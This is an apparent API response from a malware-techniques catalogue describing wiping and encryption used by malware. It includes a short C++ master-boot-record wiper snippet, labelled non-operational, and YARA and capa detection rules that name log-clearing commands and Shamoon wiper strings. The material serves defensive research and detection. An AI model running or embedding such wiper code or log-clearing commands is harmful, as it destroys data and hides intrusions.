GET /api/techniques/134/
HTTP 200 OK
Allow: GET, PUT, PATCH, DELETE, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "name": "Wiping or Encrypting",
    "category": [
        "https://search.unprotect.it/api/categories/8/"
    ],
    "description": "Malware can use wiping or encryption techniques to remove its trace from the system. They can also use this technique as a decoy but also for sabotage operations.",
    "resources": "https://securingtomorrow.mcafee.com/business/pseudo-ransomware-killdisk-creates-smoke-screen-cybercriminals/",
    "tags": "wiping, encryption",
    "snippets": [
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/3/",
            "technique": "https://search.unprotect.it/api/techniques/134/",
            "description": "Warning: the code below is a simple MBR wiper. It is currently not operational for obvious reasons.",
            "plain_code": "#include <Windows.h>\r\n#include <iostream>\r\n#include <ctime>\r\n#include <stdio.h>\r\n\r\n#define MBR_SIZE 512\r\n\r\nusing namespace std;\r\n\r\nint WipeMBR(void) {\r\n    char dmbr[MBR_SIZE];\r\n\r\n    ZeroMemory(&dmbr, sizeof(dmbr));\r\n    HANDLE disk = CreateFile((LPCSTR)\"\\\\\\\\.\\\\PhysicalDrive0\", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\r\n    WriteFile(disk, dmbr, MBR_SIZE, &write, NULL);\r\n    CloseHandle(disk);\r\n    return 0;\r\n}\r\n\r\nint main() {\r\n    cout << \"Start Wiping\" << endl;\r\n    WipeMBR();\r\n    return 0;\r\n}"
        }
    ],
    "detection_rules": [
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "UNPROTECT_wiping_event",
            "rule": "rule UNPROTECT_wiping_event\r\n{\r\n    meta:\r\n        description = \"Rule to detect wiping events logs\"\r\n        author = \"McAfee ATR team | Thomas Roccia\"\r\n        date = \"2020-11-10\"\r\n        rule_version = \"v1\"\r\n        mitre = \"T1070\"\r\n        hash = \"c063c86931c662c1a962d08915d9f3a8\"\r\n\r\n    strings:\r\n        $s1 = \"wevtutil.exe\" ascii wide nocase\r\n        $s2 = \"cl Application\" ascii wide nocase\r\n        $s3 = \"cl System\" ascii wide nocase\r\n        $s4 = \"cl Setup\" ascii wide nocase\r\n        $s5 = \"cl Security\" ascii wide nocase\r\n        $s6 = \"sl Security /e:false\" ascii wide nocase\r\n        $s7= \"usn deletejournal /D\" ascii wide nocase\r\n\r\n    condition:\r\n        uint16(0) == 0x5a4d and 4 of them\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "Shamoon_Wiper",
            "rule": "import \"pe\"\r\n\r\nrule Shamoon2_Wiper {\r\n   meta:\r\n      description = \"Detects Shamoon 2.0 Wiper Component\"\r\n      author = \"Florian Roth\"\r\n      reference = \"https://goo.gl/jKIfGB\"\r\n      date = \"2016-12-01\"\r\n      score = 70\r\n      hash1 = \"c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a\"\r\n      hash2 = \"128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd\"\r\n   strings:\r\n      $a1 = \"\\\\??\\\\%s\\\\System32\\\\%s.exe\" fullword wide\r\n      $x1 = \"IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB\" wide\r\n      $s1 = \"UFWYNYNTS\" fullword wide\r\n      $s2 = \"\\\\\\\\?\\\\ElRawDisk\" fullword wide\r\n   condition:\r\n      ( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 3 of them )\r\n}\r\n\r\nrule EldoS_RawDisk {\r\n   meta:\r\n      description = \"EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0)\"\r\n      author = \"Florian Roth (with Binar.ly)\"\r\n      reference = \"https://goo.gl/jKIfGB\"\r\n      date = \"2016-12-01\"\r\n      score = 50\r\n      hash1 = \"47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34\"\r\n      hash2 = \"394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b\"\r\n   strings:\r\n      $s1 = \"g\\\\system32\\\\\" fullword wide\r\n      $s2 = \"ztvttw\" fullword wide\r\n      $s3 = \"lwizvm\" fullword ascii\r\n      $s4 = \"FEJIKC\" fullword ascii\r\n      $s5 = \"INZQND\" fullword ascii\r\n      $s6 = \"IUTLOM\" fullword wide\r\n      $s7 = \"DKFKCK\" fullword ascii\r\n\r\n      $op1 = { 94 35 77 73 03 40 eb e9 }\r\n      $op2 = { 80 7c 41 01 00 74 0a 3d }\r\n      $op3 = { 74 0a 3d 00 94 35 77 }\r\n   condition:\r\n      ( uint16(0) == 0x5a4d and filesize < 2000KB and 4 of them )\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "clear_log",
            "rule": "rule:\r\n  meta:\r\n    name: clear the Windows event log\r\n    namespace: anti-analysis/anti-forensic/clear-logs\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: basic block\r\n    att&ck:\r\n      - Defense Evasion::Indicator Removal on Host::Clear Windows Event Logs [T1070.001]\r\n    examples:\r\n      - 82BF6347ACF15E5D883715DC289D8A2B:0x14005E0C0\r\n  features:\r\n    - and:\r\n      - api: advapi32.ElfClearEventLogFile\r\n      - optional:\r\n        - api: advapi32.OpenEventLog"
        }
    ]
}